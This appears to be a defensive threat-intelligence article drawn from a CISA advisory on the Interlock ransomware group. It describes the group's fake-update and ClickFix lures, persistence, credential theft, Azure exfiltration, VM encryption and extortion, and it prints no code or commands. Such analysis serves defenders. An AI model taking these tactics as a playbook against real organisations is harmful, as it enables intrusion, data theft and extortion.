Interlock Ransomware 2025: Evolving Threats, Tactics, and Defense Strategies

Interlock ransomware has quickly ascended from a little-known name in late 2024 to a top-tier threat that’s been hammering organizations across North America and Europe through 2025. While other ransomware groups have faltered or faded, Interlock actors show a relentless willingness to innovate: skirting typical intrusion routes, targeting virtual infrastructure, and deploying a full arsenal of legitimate and malicious tools. As joint advisories from CISA, FBI, HHS, and MS-ISAC reveal, the group’s arsenal and methodology should push every Windows and hybrid cloud defender to reevaluate assumptions about ransomware defense.

Emerging Threat: Understanding Interlock’s Evolution and Uniqueness​

Interlock’s rapid evolution is perhaps its most chilling feature. Since its first appearance in September 2024, the group has not only avoided relying solely on familiar techniques like phishing or brute-forcing RDP but also embraced rare tactics. Chief among these is a preference for “drive-by download” initial access—compromising legitimate websites so that even security-aware users can stumble into infection. In several cases, they supplement this technical prowess with a ClickFix social engineering scheme: luring victims with a fake CAPTCHA to trigger a malicious PowerShell script manually. As McAfee and HHS advisories warn, this type of hand-in-glove blending of “living off the land” scripts and user trickery is a rising theme in ransomware, previously seen in malware like Lumma Stealer and DarkGate.
Perhaps even more notable is Interlock’s focus on virtual machines, including encryptors built for both Windows and Linux, echoing concerns stoked by the rise of Rhysida and Akira ransomware families. While their encryptors have so far ignored workstations and physical servers, there is every reason to think this will change, given the actors’ opportunistic nature. Today’s VM-focused group could be tomorrow’s enterprise-wide destroyer.
A key point verified across multiple sources is Interlock’s double-extortion methodology. Not only do they encrypt data, but they also exfiltrate substantial amounts before ransoming, strengthening their leverage: pay up, or both your files and sensitive company data may hit the public web. This shift, now standard among leading ransomware groups, means the impact goes beyond lost productivity—it introduces regulatory, reputational, and legal risks that can far outstrip the ransom itself.

Initial Access: Innovative Deception​

Interlock’s entry points are both sophisticated and, arguably, more dangerous than the industry standard. Unlike many ransomware gangs relying on basic phishing, Interlock frequently compromises legitimate websites to distribute their malware, making drive-by downloads [T1189] a primary initial access vector. According to Sekoia’s threat intelligence, they often disguise payloads as fake updates for browsers (Chrome, Edge) or, more recently, security software such as FortiClient, Ivanti Secure, GlobalProtect, and others. Upon a hapless employee’s download, a remote access trojan (RAT) is delivered, opening the door for lateral movement.
The ClickFix social engineering approach, detailed in advisories from McAfee and HHS, adds another layer of danger. Victims are faced with a convincingly designed fake CAPTCHA, which instructs them to copy and run a Base64-encoded PowerShell command using Windows’ Run dialog. The fact that this process requires intentional action from a user (copying, pasting, running a script) makes it harder to detect or block by routine anti-phishing measures, and it signals a growing sophistication in user manipulation unseen in many ransomware operations.

Execution and Persistence: A RAT-Infested Infrastructure​

Once foothold is achieved, the fake browser or update executable acts as a RAT, executing PowerShell scripts designed to establish persistent access. This includes dropping files in the Windows Startup folder [T1547.001] to ensure enduring control with every user login, and modifying registry run keys camouflaged as legitimate updaters (“Chrome Updater”) to evade both human scrutiny and automated detection mechanisms.
Investigations have found that these scripts often run additional reconnaissance commands—ranging from enumerating current users [T1033] and detailed system configurations [T1082], to running ARP table lookups [T1016] and mapping network drives—to lay out a complete attack roadmap. This layered recon not only speeds up lateral movement but also helps identify critical data and infrastructure for exfiltration and encryption.

Tools and Payloads: Playing Both Sides of the Line​

Interlock’s arsenal includes both custom and off-the-shelf tools, some of them familiar to many IT professionals:

• AnyDesk and ScreenConnect: Legitimate remote access utilities, often employed maliciously for persistent and stealthy remote control after credential capture.
• Cobalt Strike and SystemBC: Framed as tools for penetration testing, they’re widely abused for command and control (C2) operations and payload delivery by criminal networks.
• PowerShell, PSExec, PuTTY, WinSCP: Ubiquitous IT management and file transfer tools—trusted by admins and easily abused for lateral movement, data collection, and exfiltration.
• Custom credential stealers and keyloggers: Tools like cht.exe (credential stealer) and klg.dll (keylogger), as well as information stealers like Lumma and Berserk Stealer, help harvest credentials and elevate privileges. These have been observed as late as February 2025, indicating ongoing adaptation, especially after law enforcement disrupted parts of the Lumma Stealer supply chain.

File hashes associated with Interlock operations (detailed in recent CISA advisories) should not automatically be assumed malicious, given how many legitimate tools are abused in their campaigns—a critical fact that defenders must remember to avoid blocking core business functions without due evidence.

Credential Access and Privilege Escalation: From Stealing Passwords to Owning Domains​

Credential access is where Interlock excels in both breadth and depth. Upon gaining an initial foothold, actors deploy credential stealers and keyloggers to harvest stored credentials, monitor user keystrokes (conhost.txt masquerading as a legitimate file), and quickly expand their reach across the network. Notably, attacks leveraging information stealers like Lumma and Berserk have enabled both lateral movement and privilege escalation [T1078], allowing Interlock to compromise administrator accounts, often through techniques like Kerberoasting [T1558.003].
The group’s readiness to exploit Remote Desktop Protocol (RDP) [T1021.001], AnyDesk, PuTTY, and even cracked versions of remote support solutions such as ScreenConnect, strongly suggests that compromise of a single desktop or server can rapidly metastasize through an enterprise—even if multi-factor authentication (MFA) is inconsistently applied.

Data Collection and Exfiltration: The Azure Angle​

While many ransomware groups focus purely on local file encryption, Interlock has demonstrated a keen awareness of enterprise cloud storage. They employ Azure Storage Explorer and AzCopy to examine and extract data from Microsoft Azure Storage accounts, uploading it to attacker-controlled blobs outside corporate boundaries. WinSCP and other SFTP/SCP tools provide alternative exfiltration routes when needed.
This focus on cloud resources means defenders who only watch on-premises traffic are dangerously exposed. Monitoring for anomalous access to cloud storage endpoints—especially large, unexpected uploads—should become standard practice, particularly for organizations with significant digital assets in Microsoft’s ecosystem.

Impact: Double Extortion and the VM Focus​

With reconnaissance and exfiltration complete, Interlock actors deploy a bespoke encryption binary (conhost.exe or similar), targeting primarily VMs (including FreeBSD, a move that sets Interlock apart from most ransomware groups that focus on Linux or ESXi environments). The ransomware leverages combined AES and RSA algorithms for robust encryption [T1486], nearly always leading to irretrievable loss of files absent the decryption key.
The double-extortion model—encrypt then threaten to leak exfiltrated data—adds a powerful pressure point. Victims receive a ransom note (![B]README[/B]!.txt), a unique code, and are told to open a Tor browser and contact the extortionists; only after communication are ransom demands (usually in Bitcoin) revealed. Failure to pay leads to public data leaks, historically carried out as promised, raising the stakes far beyond a recovery operation.
Experts warn that this approach ensures that, even with solid backups, organizations remain at risk for catastrophic data and brand damage if evidence of intellectual property or regulated data theft emerges.

MITRE Tactics and Techniques: A Roadmap for Defenders​

Interlock operations, as meticulously mapped by the MITRE ATT&CK framework in the joint advisory, span nearly every phase of a modern cyber kill chain:

• Initial Access: Tactics like drive-by compromise [T1189] and fake software updates—rare among major ransomware families.
• Execution and Persistence: PowerShell and registry hijacking ensure resilience and camouflage.
• Credential Access: Deployment of credential stealers and keyloggers, plus Kerberoasting for domain escalation.
• Discovery, Lateral Movement, Collection: Systematic reconnaissance, lateral hops with RDP/PUTTY/AnyDesk, and collection from both local and cloud data stores.
• Exfiltration: Use of AzCopy, WinSCP, and alternative protocols ensures multi-layered data theft.
• Impact: Final-stage deployment of robust encryptors, file deletion for defense evasion [T1070.004], and extortionate pressure via leak threats.

This well-rounded, multi-stage process leaves few gaps—whatever the posture of a typical small or midsize enterprise.

Notable Strengths of Interlock’s Ransomware Campaigns​

• Opportunistic Targeting: Actors cast a wide net across business and critical infrastructure sectors. As CISA and Sekoia both found, the use of drive-by compromise means nearly any organization with lax web filtering is at risk.
• VM and Cloud Awareness: By focusing on VMs, especially in VMware and FreeBSD environments, Interlock attacks organizations’ most critical virtual resources, maximizing disruption. Their use of Azure-native tools for exfiltration is another advanced, enterprise-focused tactic.
• Multi-Platform Capability: Windows, Linux, and FreeBSD encryptors are in concurrent use, thwarting “server monoculture” defenses.
• Hybrid Social Engineering & Technical Tactics: The ClickFix approach is a worrying evolution, bypassing spam filters and many email defense systems by requiring user action not by trickery alone but by staged interaction (e.g., fake CAPTCHA).
• Evasive Techniques: Registry and file masquerading, deletion of binaries/toolings after execution, and use of legitimate signed tools all complicate detection and forensic attribution.

Potential Weaknesses and Areas for Defensive Leverage​

While formidable, Interlock’s techniques are not invulnerable:

• Relies on User Interaction: Many initial access scenarios still depend on users downloading, copying, or running unknown content. Organizations with rigorous, ongoing security awareness training are better positioned to mitigate this.
• Endpoint Detection Opportunities: Sophisticated EDR and timely OS patching can thwart many of their PowerShell-based persistence and lateral movement tactics.
• Cloud Monitoring Blind Spots: The actors’ use of Azure-native tools for exfiltration is only effective if organizations lack robust cloud activity monitoring and alerts. Enhanced log analysis and anomaly detection on cloud platforms is key to catching data theft early.
• Shadow IT Risks: The availability of cracked remote access tools like ScreenConnect means IT should inventory and vet any remote access or file transfer apps running on endpoints.

Recommendations: Hardening Defenses Against Interlock and Ransomware Alike​

Following the cross-government recommendations is a minimum, but the Interlock playbook makes several things especially urgent for Windows and cloud-centric organizations:

1. Enhance DNS and Web Filtering​

Drive-by downloads are preventable with robust filtering, denying access to known malicious or compromised domains.

2. Zero-Trust and Segmentation​

Strict network segmentation, especially between VMs and user workstations, caps the damage potential if a single endpoint is compromised. Zero-trust policies help slow or block lateral movement.

3. Harden Credentials and MFA​

Enforce NIST-standard passwords and require MFA on all remote, cloud, and admin interfaces—especially RDP, Azure, and remote management portals.

4. EDR and Behavioral Monitoring​

Deploy advanced endpoint detection across all servers, VMs, and endpoints—with a focus on PowerShell, registry, startup folder, and cloud tool activity. Prioritize behavioral analytics over signature detection.

5. Comprehensive Backups and Irreversible Storage​

Maintain encrypted, immutable, and offline backups; rehearse restoration processes regularly, especially for virtual environments.

6. Drill and Validate Security Controls​

Routinely stress-test all security controls with attack emulation mapped against MITRE ATT&CK techniques; focus on both detection and response.

7. Train, Then Train Again​

Continue to educate employees on social engineering and the dangers of unexpected software updates and CAPTCHAs—addressing not just phishing, but more subtle user-targeted ruses.

8. Cloud Visibility​

Adopt tools for continuous monitoring of cloud storage, focusing on unusual data movements and access by new or unauthorized accounts.

Critical Analysis and Industry Outlook​

Interlock ransomware’s trajectory offers a troubling preview of the next generation of digital extortion threats. What sets this group apart is not any single technical breakthrough, but a fusion of innovation, agility, and ruthless pragmatism: they use whatever works—even if it means co-opting everyday IT tools, patiently crafting multi-step user deceptions, or focusing on infrastructure (VMs, cloud storage) that many defenders still treat as “second tier” compared to endpoints.
The potential for Interlock to expand its targeting beyond VMs—already hinted at in joint bulletins—should serve as an alarm bell for all sectors. Just because a threat group “hasn’t yet” attacked core servers or physical endpoints doesn’t mean they won’t. Indeed, attackers frequently use these preliminary campaigns to map new offensive strategies, adapt to changing defenses, or simply await a wider pool of victims.
Although Interlock is sophisticated and persistent, the group’s dependence on a blend of legitimate IT tools and human error means that robust, holistic cyber hygiene—including cloud, endpoint, and user-centric defenses—still offers considerable protection. Enterprises that ignore cloud data movement, under-fund employee security awareness, or delay implementation of least-privilege/MFA controls will be most vulnerable.
Yet, as ransomware attacks become more customized and extortion pressures increase through public leaks, recovery without a multi-layered, rigorously tested incident response plan grows increasingly unlikely. Paying the ransom remains a gamble, offering no guarantee of data recovery and risking further regulatory or criminal exposure—a point the authoring agencies continue, correctly, to emphasize.

The Road Ahead: Action Over Apathy​

The Interlock campaign’s speed, polymorphism, and craft signal a move toward ransomware built not just for immediate profit, but for enduring disruption, brand destruction, and system-wide trauma. Every IT and security leader must treat the group’s techniques as a preview—not an outlier—of what’s to come from both criminal and nation-state ransomware operators.
To weather this new era, organizations must push beyond traditional, reactive approaches. That means not only following the latest joint advisories, but also demanding clearer cloud visibility, attacking insider threats with as much vigor as external ones, and testing every security control against real, mapped attacker behavior. The price of complacency in the face of Interlock is not just operational downtime—but potential extinction as a trusted digital entity.
For detailed indicators of compromise (IOCs), the latest hashes, and in-depth technical breakdowns, defenders should refer to the official advisories from CISA and trusted research partners, and regularly consult resources on StopRansomware.gov. Immediate action, continuous learning, and industry sharing remain some of the only reliable shields against what is, for now, one of the most dangerous ransomware families targeting Windows, hybrid, and cloud-centric organizations.

---

Source: CISA #StopRansomware: Interlock | CISA